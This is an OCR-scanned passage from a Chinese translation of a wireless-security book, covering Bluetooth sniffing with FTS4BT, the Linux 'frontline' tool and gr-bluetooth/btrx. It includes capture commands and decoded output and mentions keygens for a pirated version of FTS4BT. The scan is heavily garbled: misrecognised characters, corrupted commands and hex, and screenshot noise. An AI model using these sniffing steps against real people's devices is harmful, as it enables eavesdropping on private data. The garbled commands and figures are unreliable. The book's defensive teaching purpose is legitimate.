FTS4BT 窃 听 器 非常 贵 ， 它 的 零售 价 是 1 万 美元 。 然 而 ， 在 分 析 和 为 蓝牙 网 络 进行 排 障 时 ， 它 是 非常 有 用 的 一 个 工具 。 除 了 可 
以 作为 事实 的 蓝牙 无 线 窃听 器 分 析 工 具 之 外 ， 它 还 可 以 找到 蓝牙 拷 术 中 Bluetooth Profiles 层 的 配置 错误 。FTS4BT 可 以 快速 地 找 
到 数据 交换 中 的 性 能 问题 ， 使 用 其 他 的 工具 还 可 以 分 析 SCO 音 频 连 接 数据 的 内 容 ， 所 以 对 于 任何 开发 蓝牙 技术 的 机 构 来 
襄 ，FTS4BT 都 拥有 和 它 价格 相等 同 的 作用 。 


在 购买 了 FTS4BT 之 后 ， 用 户 可 以 得 到 工具 的 软件 包 以 及 FTS4BT ComProbe 硬 件 。 监 牙 ComProbe 硬 件 可 以 通过 两 种 方式 
获取 : 一 种 是 通过 馈赠 方式 ， 如 右 图 所 示 ; 对 于 老 用 户 来 说 ， 签 署 一 份 有 效 的 维护 合同 ， 可 以 免费 进行 硬件 更 换 。 


尽管 FTS4BT 的 设计 初衷 是 对 授权 的 蓝牙 网 络 连接 进行 故障 排除 ， 它 还 可 以 用 做 攻击 工具 。 因 为 许多 蓝牙 交换 都 是 不 加 密 
的 ， 所 以 通过 简单 地 捕获 数据 ， 攻 击 者 残 可 以 获得 有 用 的 、 敏 感 信息 。 


在 启动 FTS4BT 无 线 窃听 器 工具 之 后 ， 可 以 看 到 FTS4BT Datasource (数据 源 ) 选择 工具 。 这 个 工具 允许 你 浏览 ComProbe 
设备 的 配置 细节 ， 如 下 图 所 示 。 


加 Settings 


Llock Snchronlzatom | 国民 天 Inqulry - Inguire Slave to learn its clock. walt for Master to page the Slave. 


| Drift Compensation 


Discower Devices... Master [Ox001 bB35d56Bc] Joshua Wright 部 王 | Clase: al ”| 
Swap : 


Choose Pair from Slave: |[0x001d25ec4786] 5CH-I6D0 ™ Class. |] 上 | sy 
Device Database... 
| LAP-UAP-NAP 
Encryptior: Filter Du 一 一 


[None escosco 


lw Nulls and Polls 


| Frame Slicing dwvanced : Cancel | Help : 


FTS4BT 穷 听 工 具 组 件 需 要 终端 用 户 和 目标 蓝牙 网 络 提供 的 信息 来 对 数据 进行 捕获 。 为 了 初始 化 数据 包 捕 获 ， 终 端 用 户 必须 
指定 从 设备 和 主 设备 的 蓝牙 地 址 。 如 果 设 备 是 不 可 发 现 的 ， 那 么 ComProbe 通 过 执行 查询 -扫描 可 以 识别 它们 ; 如 果 设 备 是 可 发 
现 的 ， 那 么 可 以 点 击 DiscoverDevices... (发 现 设 备 ) 按钮 。 如 果 FTS4BT 之 前 发 现 过 设备 的 话 ， 那 么 用 户 可 以 选择 Choose Pair 
From Device Database. (从 设备 数据 库 选 择 配 对 ) 确认 主 设备 和 从 设备 的 监 牙 地 址 信息 。 如 果 设 备 地 址 是 通过 其 他 方式 得 到 
的 话 (比如 ， 第 8 章 中 介绍 的 那些 发 现 技 巧 ) ， 那 么 用 户 可 以 手动 输入 它们 ， 地 址 前 面 的 0x 表 示 它 们 是 十 六 进 制 的 数值 。 


在 开始 数据 包 捕获 之 前 ， 用 户 还 需要 选择 时 钟 同步 技术 。 有 三 种 不 同 的 时 钟 同步 技术 可 供 选择 : 


. 从 设备 查询 模式 ”ComProbe 通 过 向 从 设备 发 送 查 询 请 求 确认 从 设备 的 时 钟 信息 。 一 旦 获取 了 信息 之 后 ，ComProbe 可 以 与 
从 设备 进行 跳 频 直到 主 设备 呼叫 从 设备 ,准备 发 起 连接 。 在 看 到 主 设 备 呼叫 之 后 ，ComProbe 可 以 跟踪 主 设备 的 时 钟 捕 获 所 有 极 
微 网 中 的 数据 。 这 项 技术 要 求 从 设备 处 于 可 发 现 模 式 下 (对 最 初 的 查询 请 求 做 出 回应 ) 。 


. 主 设 备查 询 模 式 ” 这 个 技术 与 从 设备 查询 模式 类 似 ，ComProbe 发 送 查 询 请 求 的 对 象 是 主 设备 而 不 是 从 设备 。 这 项 技术 要 
求 主 设备 处 于 可 发 现 模式 下 ,但 是 对 从 设备 没有 这 个 要 求 。 


: 从 设备 呼叫 模式 ”通过 向 从 设备 发 送 一 个 呼叫 请 求 而 不 是 查询 请 求 ，ComProbe 伪 装 成 极 微 网 的 主 设备 尝试 与 从 设备 建立 
连接 。 在 获得 了 回应 之 后 (还 有 从 设备 的 时 钟 信息 ) ，ComProbe 并 不 会 关闭 连接 ， 最 终 导 致 与 从 设备 的 连接 超时 。 使 用 从 设备 
的 时 钟 信息 ，ComProbe 对 从 设备 的 跳 频 模 式 进行 跟踪 ， 直 到 发 现 了 主 设备 的 呼叫 请 求 ， 与 从 设备 查询 模式 一 样 完成 监控 交换 。 
从 设备 呼叫 模式 的 好 处 是 只 需要 从 设备 或 者 主 设备 之 一 处 于 可 发 现 模式 下 就 可 以 对 极 微 网 进行 窃听 。 


但 是 FTS4BT 米 用 的 3 种 时 钟 同步 技术 都 需要 ComProbe 友 现 主 设备 向 从 设备 友 送 的 初始 呼叫 帧 ， 限 制 了 它 捕获 新 建 的 极 和 
网 通信 数据 包 的 能 力 。FTS4BT 无 法 对 正在 进行 通信 的 极 微 网 进行 窃听 。 从 攻击 的 角度 来 说 ， 这 个 缺陷 是 怪 命 的 ， 但 是 它 却 符合 
FTS4BT 的 运作 标准 : 工程 师 在 对 蓝牙 产品 进行 排 障 时 ， 都 会 在 主 设备 和 从 设备 组 成 极 微 网 之 前 进行 数据 捕获 ， 但 是 攻击 者 却 想 
从 活动 的 网 络 连接 中 收集 数据 。 和 幸运 的 是 ， 即 使 网 络 已 经 建立 完毕 ， 我 们 还 有 其 他 的 选择 可 以 捕获 监 牙 通信 数据 包 ， 在 本 章 的 后 
面部 分 我 们 将 对 此 进行 介绍 。 


一 旦 用 户 在 ComProbe 中 配置 好 了 需要 的 同步 技术 和 主 、 从 设备 的 监 牙 地 址 信息 ， 他 就 可 以 点 击 工 具 栏 上 Play (运行 ) 按钮 
发 起 新 的 数据 包 捕 获 。 用 户 可 以 指定 将 捕获 的 数据 包 绥 站 到 内 存 (或 者 在 停止 捕获 后 存储 到 文件 中 ) 或 者 缓存 到 文件 中 。 在 停止 
数据 包 捕 获 后 ，FTS4BT 会 对 捕获 到 的 数据 包 内 容 进行 解析 和 解码 ， 用 户 也 可 以 选择 查看 单个 帧 的 内 容 或 者 是 指定 协议 的 数据 


包 ， 如 下 图 所 示 。 


FTS4BT 的 文件 浏 史 器 界面 与 Wireshark 类 似 ， 用 尸 可 以 在 导航 树 选择 单个 帧 查看 它 的 编码 内 容 。 被 选 数据 包 的 内 容 可 以 通 
过 ASCII 码 、 十 六 进 制 和 二 进 制 的 格式 显示 。 点 击 数据 包 列 表 上 的 任意 协议 或 者 规范 标签 将 目 动 应 用 一 个 过 滤器 ， 工 具 会 在 列表 
中 目 动 排 除 不 包含 所 选 协议 内 容 的 数据 帧 。 


| 二 


EE Frame Display - 72105 BCard_exchange,cfa 疡 -| 匡 -| 靶 : 语 


File Edit View Format Fiter OQptions Window Help 
省 让 Pp»@ i MA ES a MS @ udefram 


[EE [到 铝 Summar | OPP Baseband with Auto-traverse 


| Unfiltered | Baseband | LMP |L2CAP |SDP |RFCOMM | 0BEX | OPP 


B... Frame# hole Bddr. Data Fram... belta Timestamp 
入 的 | *BEGIN-YCARD.YERSION:Z.1..N:.., 十 Peia005 12:0449.8666 ... 


上 并 丰 种 贡 由于 雪山 洛 入 四 十 洛 册 交 过 出 总 着 


Frame 89: [Master] Len=45 Noa salaozl ss 
* means that the data were reconstructed. ; i 名 D5 VDD 与 上 本 有 了 3 生 届 生 忆 与 与 征 生 生 绸 
+ Basebard: 村” 起 二 看 了 向 字 癌 = 语 S| 已 让 折 与 Dd ga 
tAP 记 生 与 卫 已 卫生 村 县 与 外 了 生 呈 a 于 冲 并 县 外 了 日 : 互 
+ BFCOMM: 站 时 = 己 
9- OBE E 
CR ma uuuRMC=LUID: O0600 
lIasSnrEND VCARD''F 
到， 
a 
td | 


Total Frames: 104 FramesFiltered In: 1 Frame ¥s Selected: B89 (1 total) [45 bytes] 
For Help press F1 


如 果 数 据 包 捕 获 包 合 OBEX、FTP、SYNC、 打 印 、 成 像 、RFCOMM、 电 话 本 访问 或 者 音频 交换 这 样 的 通信 数据 包 ， 那 么 
FTS4BT 将 自动 解析 并 提取 数据 ， 将 它们 重新 整合 成 原始 的 文件 格式 。 对 于 攻击 者 来 说 ， 这 是 很 有 帮助 的 一 项 功能 ， 因 为 捕获 结 
果 中 所 有 的 数据 包 都 可 以 被 提取 出 来 ， 重 新 转换 成 原始 格式 。 进 一 步 来 说 ， 用 户 不 需要 为 FTS4BT 指 定数 据 集 或 者 规范 。 用 户 可 
以 点 击 View (视图 ) |Extract Data... (获取 数据 ) 打开 Data Extraction Setting (数据 提取 设置 ) 对 话 框 。 可 以 选择 需要 提取 
数据 的 协议 (或 者 选择 所 有 支持 的 协议 ) ， 指 定 输出 目录 和 文件 名 前 弘 ， 如 右 图 所 示 。 在 点 击 OK 按 钮 之 前 请 确保 输出 目录 已 经 
仔 在 。FTS4BT 将 处 理 被 选 协 议 的 所 有 帧 ， 进 行 数据 整合 ， 使 用 原始 文件 名 存储 结果 (如 果 已 知 的 话 ) 或 者 根据 给 定 的 文件 名 前 
缀 生成 连续 的 文件 名 。 


Data Extraction Settings | | 


elect Prolile 二 = 
Path: JsersWoshua wiright\Desktop\bt-data-extract | | 
UPP | 


FTP Base File Name: bt-dataextraction 
WSTNL 
|BPP 
yjBIF 
vy|HCRP 
voPP 
wv|PBAP 


区 a : oop 
| ok | [Cancal] 


| Dpen Filels] After Extraction 


注意 ”如 果 读 者 想 要 证 实 FIS4BT 的 这 项 特性 ， 可 以 在 本 书 的 配套 网 站 (http://www.hackingexposedwireless.com) 上 获得 
FTS4BT 捕 获 的 名 片 交 换 数据 包 ， 它 的 文件 名 是 72105_BCard_exchanee cfa。 使 用 FTS4BT 的 数据 提取 例 程 可 以 从 数据 包 捕获 内 容 中 
获取 已 经 传输 的 名 片 ， 保 存 的 文件 名 为 Bean，_David.vcf。 


如 果 你 对 老 的 ComProbe 使 用 的 硬件 感到 十 分 好 奇 ， 那 么 这 并 不 奇怪 。FTS4BT 老 的 ComProbe 只 是 简单 的 标准 蓝牙 接口 ， 
它 配 有 有 自 定义 的 固件 ， 用 来 作为 蓝牙 穷 听 器 。ComProbe 采 用 的 自 定义 固件 是 由 Cambridge Silicon Radio (CSR) 公司 设计 
的 ， 同 样 监 牙 接口 也 是 由 这 家 公司 所 生产 的 ， 它 独家 授权 FTE 在 FTS4BT ComProbe 中 使 用 这 个 固件 。 


为 了 建立 在 蓝牙 窃听 领域 的 地 位 ，FTE 一 直 都 提供 FTS4BT 产 品 的 免费 下 载 ， 但 是 限制 用 户 解 密 捕 获 的 数据 包 文 件 。2007 
年 ，Max Moser 友 现 FTE 无 意 间 将 CSR 监 牙 接 口 的 无 线 穷 听 器 固件 与 免费 下 载 的 软件 打包 在 一 起 ， 此 时 FTS94BT 的 版 本 号 是 
5.6.9.0。 使 用 标准 的 Linux 工 具 ， 比 如 bccmd、bdaddr 和 dfutool，Moser 重 建 了 一 个 与 FTS4BT 相 匹配 的 蓝牙 窃听 器 接口 。 尽 
管 Moser 的 论文 缺少 了 一 些 建 立 与 FTS4BT 相 兼容 的 窃听 器 接口 的 命令 细节 ， 但 是 在 互联 网 上 ， 仍 然 有 许多 告诉 你 如 何 去 做 的 指 
南 。 


注意 FFTS4BT 仍 然 是 可 以 免费 下 载 的 ， 下 载 网 址 是 http://www.fte.com/support/FTS4BTVFTS4BT-download.asp， 用 户 可 以 
使 用 它 浏览 蓝牙 数据 包 捕 获 结 果 (但 不 包括 最 新 的 无 线 穷 听 器 固件 文件 ) 。FTS4BT 浏 览 器 可 以 配合 本 书 配套 网 站 
http://www.hackingexposedwireless.com 上 的 样本 捕获 文件 一 同 使 用 。 


尽管 FTE 从 他 们 的 网 站 上 删除 了 所 有 包含 无 线 窃 听 器 固件 的 FTS4BT 版 本 ,但 FTS4BT 5.6.9.0 的 软件 依然 在 互联 网 上 广泛 流 
传 。 在 Moser 的 论文 之 后 ， 人 们 公布 了 许多 注册 机 ， 人 允许 用 尸 使 用 文件 浏览 器 ， 获 取 一 组 伪造 的 验证 码 来 解锁 FTS4BT 的 实时 捕 
获 功能 。 


非法 软件 的 威胁 


在 整理 这 些 材料 的 时 候 ， 我 们 决定 不 介绍 重 现 Moset 复 制 FITS4BT 无 线 窃听 器 接口 的 详细 步 又。 尽管 蓝牙 窃听 器 对 于 分 析 蓝 牙 
安全 十 分 重要 ， 但 是 我 们 相信 这 是 不 道德 的 ， 它 违反 了 FTS4BT 的 版 权 ， 相 当 于 从 FTE 偷 取 了 这 个 软件 。 作 者 认为 很 有 必要 向 读 
者 讲解 违法 (或 者 授权 ) 使 用 FTS4BT 的 威胁 。 


在 进行 渗透 测试 时 ， 询 问 目标 机 构 : “你 愿意 防范 拥有 何 种 资源 的 攻击 者 ?” ”有些 机 构 可 能 会 决定 防范 那些 愿意 花费 1000 美 
元 攻击 他 们 网 络 的 攻击 者 ， 那 么 他 们 防御 的 目标 就 是 标准 攻击 。 另 外 一 些 机 构 的 回答 可 能 是 那些 愿意 花费 1 万 美元 的 攻击 者 ， 
样 他 们 需要 防御 的 就 是 那些 复杂 的 攻击 工具 。 更 有 甚 者 的 回答 可 能 是 需要 防范 那些 愿意 花费 数 百 上 千 万 的 攻击 者 ， 因 为 这 样 大 大 
增加 了 它们 对 于 机 构 的 威胁 。 


根据 类 似 的 风险 模型 ， 一 个 机 构 可 能 决定 不 防范 那些 只 愿意 花费 1000 美 元 购买 FTS4BT 的 攻击 者 。 然 而 ， 通 过 那些 公开 的 
FTS4BT 硬 件 复 制 研究 以 及 广泛 流传 的 生成 非法 验证 码 的 软件 ， 攻 击 者 可 能 只 需要 25 美 元 就 能 够 获得 价值 1 万 美元 的 工具 了 。 因 
此 ， 这 个 工具 所 产生 的 威胁 就 大 大 增加 了 ， 每 个 机 构 都 必须 考虑 自己 是 否 暴露 在 了 这 种 类 型 的 攻击 之 中 。 


@” Linux 上 的 frontline 穷 听 工 具 
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在 发 现 重 建 监 牙 无 线 穷 听 器 接口 非常 简单 之 后 ， 研 究 者 开始 对 FTS4BT 老 的 ComProbe 的 能 力 进行 评估 ， 他 们 的 目标 是 打造 
一 个 全 能 的 Linux 上 蓝牙 穷 听 器 。 但 是 这 样 的 蓝牙 穷 听 器 在 当前 是 不 现实 的 。 昌 然 在 Linux 平 台 上 ， 蔓 牙 通 信 数 据 包 捕获 软件 的 开 友 
已 经 有 了 一 些 进步 


这 个 工具 从 来 没有 正式 发 表 过 ， 但 是 根据 它 源 代码 的 名 称 ， 人 们 称 它 为 Bt 或 者 frontline.c。 可 以 使 用 并 行 版 本 系统 
(Concurrent Versioning System，CVS) 工具 获取 它 的 最 新 源 代 码 ， 如 下 所 示 : 


U 


顺序 进行 的 : 


sudo apt-get install cvs 

CVS -23 -d :pserver:anoncvs@darkircop.org/home/cvas checkout bt/frontline 
vs checkout: Updating bt/frontline 

bt/frontline/Makefile 

bt/frontline/README 

bt/frontline/frontline;iec 

bt/frontline/sync.sh 

切换 到 bt/frontline 目 录 下 ,创建 源 代码 ， 指 定 -h 参 数 运 行 生 成 的 可 执行 文件 ， 确 保 你 的 操作 都 是 按照 
5 make 

CC ~—Wall -gqg -CC -oO frontline.o frontline.c 

cc -Wall -9 可 -D firontline frontline.o -lbluetooth 


$ ./frontline -h 


Usage: ./frontline <opts> 
= helrpr 

一 器 <dev> 

= timer 

二 二 <ft1ilter> 

二 号 stop 

= 和 <masterldslave> 

一 后 sniff 

= <idgqnore type> 

= 到 1Gnore zero length packets 
-Pp own pi1in 

—W <dump to file> 


如 果 人 在 系统 上 插 上 了 老 的 FTE ComProbe， 可 以 测试 Linux 栈 是 否认 识 并 且 支 持 这 个 设备 : 

3 sudo hciconfiqg hci0 up 

$s$ sudo hciconfig hcid0 

heid: Type: USB 
BD Address: O00:0A:94:FI:1B:FE ACL MIU: 0:0 SCO 
UP RUNNING RAW 
RX bytes:1]1]8 acl:W sco:0 events:0) errors:Uu 
TX bytes:118 acl:0 sco:0 commands:6 errors:0 

$ sudo ./frontline -d hci0 -t 


Timer e465211 


MTU: 0Q:0 


在 将 接口 调整 到 up 状态 后 ， 我 们 可 以 看 到 hciconfig 标 志 中 出 现 了 RAW 选 项 ， 表 示 设 备 提供 对 无 线 穷 听 器 功能 的 支持 。 使 用 -t 参 


数 运 


ComProbe 与 极 微 网 主 设备 的 时 钟 进 


行 frontline 工 具 获 取 接 口 的 本 地 时 钟 信息 ， 请 确认 frontline 可 以 和 无 线 穷 听 器 接口 进行 通信 
要 捕获 监 直 网 络 的 通信 数据 包 ， 请 打开 两 个 终端 窗口 。 在 第 一 个 窗口 中 ， 可 以 使 用 提供 的 执行 脚本 sync.sh， 它 会 


行 同 步 。 运 行 脚 本 ， 如 下 所 示 : 


证 


$$ chmod 755 sync.sh 

5 Sudo ./avync.3h hci0 O00:1D:25:EC:471:86€ 
Synching 

Synched 


指定 ComProbe 接 口 的 名 称 以 及 主 设备 的 蓝牙 地 址 。 要 消除 ComProbe 时 钟 的 误差 ，sync.sh 脚 本 每 隔 30 秒 都 会 与 指定 的 主 设备 


再 次 进行 同步 。 


在 sync.sh 运 行 的 时 候 ， 使 用 第 二 个 终端 窗口 开始 进行 捕获 ， 将 内 容 存储 到 一 个 文件 中 : 


$ sudo ./frontline -qq hci0 -ee -w bt-sniff.dump 

Unknown type: 1 

Unknown type: 4 

Unknown type: 

Unknown type: 

Unknown type: 1 
Unknown type: 4 


注意 ，frontline 是 一 个 有 限制 的 工具 ， 它 并 不 支持 ComProbe 穷 听 器 中 所 有 的 数据 类 型 。frontline 通 常会 产生 错误 的 未 知 
类 型 ， 但 是 这 个 错误 并 不 会 影响 我 们 捕获 主 、 从 设备 之 间 的 数据 交换 过 程 。 


一 旦 主 、 从 设备 开始 交换 数据 ，frontline 的 结果 与 下 面 显示 的 类 似 : 


HL OxO0F Ch 39 M Clk UxACBAES4 -atus UXU Hdr0 Vx8] 


t t 
HL OXx0F Ch 20 M Clk OxACBAFO tatus UXU Hdro Ox81 [type: 
t t 


py 


HL UKXUE Ch 32 M Clk UxACBAF24 Status OUXU Hdro0 Ox89 


从 输出 结果 中 可 以 看 到 ， 头 长 度 (HL) 有 15 字 节 (0x0F) ， 之 后 是 信道 号 。 信 道 号 之 后 的 M 表 示 帧 是 由 主 设备 友 送 的 (S 
表示 帧 是 由 从 设备 及 送 的 ) 。 随 后 是 主 设备 的 时 钟 ，ComProbe 加 上 了 一 个 状态 标识 得 90。 接着 是 以 十 六 进 制 表示 的 部 分 帧 头 信 
还 有 经 过 解密 的 帧 信息 和 逻辑 传输 地 址 信息 。 这 些 帧 的 逻辑 链 路 标识 (Logical Link ID，LLID) 都 设置 成 了 0， 长 度 也 是 


息 ， 


0。 


在 按 Ctrl+C 键 后 frontline 停 止 运行 ， 用 户 可 以 使 用 hcidump 工 具 检 查 捕 获 的 结果 。 指 定 -X 人 参数 表示 以 十 六 进 制 显示 内 容 ， 
如 下 所 示 (由 于 篇 幅 所 限 作者 对 结果 进行 了 精简 ) : 


$s$ hcidump -r bt-sniff.dump —X 

HCI sniftfer -— Bluetooth packet analyzer ver 1.42 

> HCI Event: Vendor (0xff) plen 20 
0000: 1410 bOc4 b32a 21l6e 144c 9. 
0010: fd9c 1800 

> ACL data: handle 0 flags Ux02 dlen 332 


AD 
[和 | 
[3 
Gn 
AD 
国峰 | 
Cn 
Do 
和 
| 一 
Fe 
加 
加 
Rn 
he 


> ACL data: handle 0 flags Vx02 dlen 14 
LzCAP(d}): cid Ox0041 len i0 [psm 0| 
0000: 23ef 8516 6520 6120 3344 220 666f 71220 BS..ve a UDR for 


0 © 
0010: i661 cr/ 6102 6ce: 


] 
68 6f3 420 696e valua.le host 1n 
0020: 666f T2686d 6l1 i714 696f ec4 0040 lad4d2 O00e 


不 formation..Q@.B.. 


最 新 版 本 的 Wireshark 也 能 够 对 frontline 的 结果 进行 数 气 解 密 ， 如 下 图 所 示 。 


EB bt-sniff,dump - Wireshark [口上 回 -| 臣 加 | 


Fle Edt Vew Go Capture Analyre Statistics Telephony Tools Help 


ua SHSa +90TL Aap 


i me | pe elit protocol Info 
67 0.000000 HCI_ACL Revd AcL Data [continuation to #62] 
DS OO. 000000 HCI_ACL REVD ACL Data | | 
69 0.000000 HCI_ACL RCVvd AcL Data [continyation to #68] 
0 0.000000 L2cCaP Revd connection oriented channel 


由 Frame 68 《372 bytes on wire, 372 bytes captured) 
刁 Bluetooth HCI H4 Revd ACL Data 
[Direction: Revd COxOQL)] 


HCI Packet Type: ACL Data (COx02) 
3 Bluetooth HCI ACL Packet 
O000 O000 Dooo = Connection Handle: Ox0000 
old cas ve sas = PB Flag: Start Fraoment Ce) 
6 BC Flag: Point-TO-PoTnt C0) 
Data Total Length: 367 


OOcO ff 6b 2 emember To look 

Oo0do 6&69 6 2 让 698 E | into vho sts on a 
DoDeED & 51 2 2 2 ; target tor vuln 
oofo ; 96  € erabilit ies, don 
O100 > : a Bd 69 7 20 E€ 3 73 65 73 73 ed tT limit assessim 


ON on Lt Handle tbtacl, rey 2 本 


从 运行 测试 的 角度 来 说 ，Frontline ComProbe 配 合 FTS4BT 软 件 或 者 frontline 工 具 都 是 非常 有 用 的 ， 因 为 可 以 使 用 它们 分 
析 极 微 网 中 多 种 设备 之 间 的 通信 。 但 是 ， 从 攻击 者 的 角度 来 说 ， 这 些 工具 并 不 是 那么 有 用 ， 因 为 它 要 求 窃听 会 话 在 主机 开始 通信 
之 前 就 必须 建立 完毕 。 


图 FTS4BT 和 frontline 窃 听 的 应 对 措施 


是 商业 的 FTS4BT 还 是 开源 的 frontline 窃 听 器 ， 攻 击 者 都 需要 知道 主 设备 的 蓝牙 地 址 才能 捕获 极 微 网 中 的 通信 数据 包 ，。 
两 者 都 无 法 确认 不 可 发 现 模式 的 蓝牙 设备 ， 所 以 攻击 者 必须 采取 其 他 措施 确认 主 设备 的 蓝牙 地 址 。 


为 了 防止 泄露 极 微 网 主 设备 的 蓝牙 地 址 ， 可 以 将 设备 设置 为 不 可 上 友 现 模式 ， 这 样 可 以 防止 攻击 者 使 用 这 些 工具 进行 监 牙 宕 
听 。 其 他 可 供 我 们 选择 的 蓝牙 窃听 工具 没有 这 种 限制 ， 所 以 这 个 防御 措施 的 效果 也 是 有 限 的 。 


9.2 ”开源 监 牙 急 听 工具 


除了 价格 昂贵 的 商业 工具 之 外 ， 我 们 也 可 以 使 用 开源 的 gr-blutetooth 工 具 进行 蓝牙 窃听 。 不 像 缺 少 灵 活性 的 FTS4BT 产 品 那 
样 ， 作 为 一 个 开源 工具 ， 开 发 者 能 够 任意 扩展 gr-bluetooth 的 功能 ， 这 个 特点 使 它 变 得 非常 有 用 。 


@ Linux 上 的 gr-bluetooth 窃 听 工 具 


an 


gr-bluetooth 工 具 使 用 USRP 进 行 蓝 牙 通 信和 数据 包 分 析 。 在 第 8 章 中 ， 我 们 看 到 了 gr-bluetooth 如 何 进 行 设备 发 现 ， 通 过 被 
动 窃听 获取 极 微 网 主 设备 蓝牙 地 址 的 LAP 部 分 。 但 是 ，gr-bluetooth 的 开发 者 并 不 满足 于 简单 的 设备 发 现 ， 他 们 继续 研究 如 何 从 
网 络 中 获取 更 多 的 信息 ， 如 何在 79 个 信道 中 同时 进行 被 动 蓝 牙 窃听 (尽管 这 并 不 是 很 复杂 ) 。 

第 8 章 讲 到 蓝牙 信道 跳 频 模式 是 基于 主 设备 蓝牙 地 址 中 的 LAP 和 UAP 信 息 生 成 的 。 信 道 跳 频 模式 同样 受到 极 微 网 主 设备 的 时 

钟 影响 ， 不 断 增 加 的 时 钟 值 决定 了 当前 和 未 来 通信 中 所 使 用 的 间隙 。 因 此 ， 监 牙 窃听 器 需要 所 有 这 三 种 信息 确认 信道 号 ， 对 数据 
包 的 内 容 进 行 捕获 和 解密 。 

幸运 的 是 ，gr-bluetooth 工 具 能 够 动态 地 获取 这 些 信息 。 根 据 分 析 等 级 的 不 同 会 产生 很 大 的 数据 流量 ， 所 以 我 们 建议 首先 

使 用 GNU Radio 的 usrp_rx _cfile.py 脚 本 对 网 络 活动 进行 捕获 并 将 数据 保 仔 到 文件 中 ， 如 下 所 示 : 


ML 一 忆 32 -do 30 -N 40M capture.ciile 


$ sudo usrp rx cfile.py -f 2448 
Using RX dboard A: Flex 2400 Rx 


USB sample rate 2M 


提示 ”采样 率 (通过 -d 参 数 指定 ) 控制 USRP 向 主机 系统 发 送信 号 采集 的 流量 。 将 采样 率 设置 为 32 表 示 USRP 以 每 秒 200 万 采 
样 (Msps， 每 秒 百 万 采样 率 ) ， 这 是 gr-bluetooth 要 求 的 最 小 采样 率 。 在 这 种 情况 下 ，USRP 可 以 监视 两 个 1MHz 的 信道 。 用 户 同样 
可 以 将 采样 率 设置 为 16 和 8， 它 们 的 采样 率 分 别 为 4Msps 和 8Msps， 在 增加 CPU 的 情况 下 ，USRP 可 以 监视 4 个 或 者 8 个 1MHz 的 信 

道 。 由 于 USP 总 线 的 性 能 限制 ，USRP1 的 最 大 采样 率 是 8Msps。 如 果 你 看 到 USRP 显 示 了 许多 溢出 信息 (uO) ， 可 以 尝试 将 采样 率 


增加 到 32。 如 果 想 要 同时 对 更 多 的 信道 进行 捕获 ， 那 么 请 减 小 采样 率 。 
在 这 个 命令 中 ， 使 用 usrp_rx_cfile.py 对 信道 46 和 47 (-f 2448.5MHz) 之 间 的 数据 进行 捕获 ， 及 样 率 指定 为 32， 增 葵 大 
50dB， 这 样 USRP 会 将 40 万 个 的 数据 样本 存储 到 capture.cfile 文 件 中 。 一 旦 达到 了 数据 样本 的 数量 ，usrp_rx_cfile.py 文 件 目 动 退 


出 。 下 面 使 用 btrx 工 具 对 保存 的 数据 进行 处 理 ， 如 下 所 示 : 


5 Sudo btrx ~i capture. cfile :~f 2448.3M -d .32 一 名 
上 二 和 全 二 和 年 久久 EE 
lowest channel: 46, highest channel 4 
EN YE 1 Sons USLNT SIE 
time 25]0,; channel 4171,; LAP ec4786 working on UAP/CLKl1-6 
reduced trom 64 to J2 CLK1I-6 candidates 
time 27802, channel 46,; LAP ec4786 working on UAP/CLK1-6 
reduced trom v2 to 14 CLK1I-6 candidates 
time 3970,; channel 46,; LAP ec4786 working on UAP/CLK1-6 
reduced from 14 to | CLKI1-6 candidates 
time 4122, channel 47, LAP ecd4786 working on UAP/CLK1-6 
reduced from /| to /| CLK1-6 candidates 
time 6624; channel 417,; LAP ec47186 working on UAP/CLK1-—6€ 
reduced from 1 to 3 CLKEK1-6 candidates 
time 110936, channel 4]7,; LAP ec4i786 working on UAP,/CLK1-— 
reduced from 3 to 3 CLK1-6 candidates 
time 11912, channel 4171,; LAP ecd4786 working on UAP/CLK1-6 
reduced from 3 to 2 CLE1-6 candidates 

5 Channel 47, LAP ec4786 working on UAP/CLK1-6 
reduced from 2 to 1 CLKE1=6 candidates 
We have a winner! UAP = Ox22 found after 9 total packets. 
Decoding dueued packets 
time 2010, channel 41 LAP ec4}j86 NULL 

用 


time 2802, channel 46, LAP ec4/86 NULL 
time 391U, channel 46,; LAP ec4/86 NULL 
time 11912, channel 4171, LAP ecd4786 DM3/2-DH3 
time 11913, channel 4/, LAP ec4/86 NULL 


Finishnhed decoding gueued packets 

time 11938, channel 46, LAP ec4/86 DM1 
BETDE .2 
flow: 1 


payload length: 17 


使 用 btrx， 我 们 可 以 将 参数 频率 (-f) 和 采样 率 (-d) 传递 给 usrp_rx_cfile.py， 从 数据 文件 capture.cfile 中 读 取 数据 。 通 过 
指定 -S 参 数 ，btrx 会 尝试 多 条 步骤 将 信号 信息 作为 蓝牙 数据 进行 解密 : 


1) LAP 恢 复 LAP 从 每 个 捕获 的 帧 的 同步 字 中 获取 。 


2) UAP 和 部 分 CLK 恢 复 ”根据 蓝牙 头 的 校 验 和 ，UAP 以 及 部 分 CLK 可 以 从 每 个 捕获 到 的 LAP 中 恢复 。 这 个 过 程 需要 多 个 


帧 ， 所 以 任何 当前 无 法 解密 的 数据 包 都 会 被 缓 仔 。 


3) 数据 包 和 解密 ”对 于 特定 的 LAP， 一 旦 恢复 了 UAP 和 部 分 CLK， 我 们 就 可 以 对 蓝牙 数据 包 进 行 解 密 了 。btrx 会 处 理 所 有 之 
前 被 缓 仔 的 数据 包 ， 对 非 空 帧 进行 解密 并 显示 部 分 内 容 ( 空 帧 只 包含 报头 没有 任何 的 载 合 ) 。 


在 前 面 的 例子 中 ， 我 们 看 到 btrx 通 过 9 个 包含 LAP 为 ec4786 的 帧 解密 出 UAP 为 0x25 以 及 部 分 CLK 信 息 ， 通 过 它们 对 蓝牙 数据 
包 进 行 解密 。 在 成 功 地 恢复 这 些 数据 之 后 ，btrx 对 被 缓存 的 帧 进行 处 理 ， 其 中 包含 4 个 非 空 帧 和 一 个 DM3 帧 。 接 下 来 ，btrx 继 续 
解密 剩余 的 数据 ， 在 本 例 的 结果 中 确认 了 一 个 单 槽 DM 1 数据 包 。 


使 用 btrx 解 密 数据 ， 用 尸 束 有 可 能 对 蓝牙 帧 进行 窃听 ， 并 解密 其 部 分 内 容 。 我 们 甚至 可 以 根据 Linux 的 TAP/ATUN 模 型 ,使 用 
btrx 将 解密 好 的 数据 写 入 一 个 虚拟 接口 中 ， 最 终 将 它们 保存 到 libpcap 数 据 包 捕获 结果 文件 中 。 在 载 入 Linux 的 tun 内 核 模块 之 
后 ,我 们 首先 需要 创建 一 个 名 为 gr-bluetooth 的 虚拟 接口 : 


$ Sudo modprobe tun 

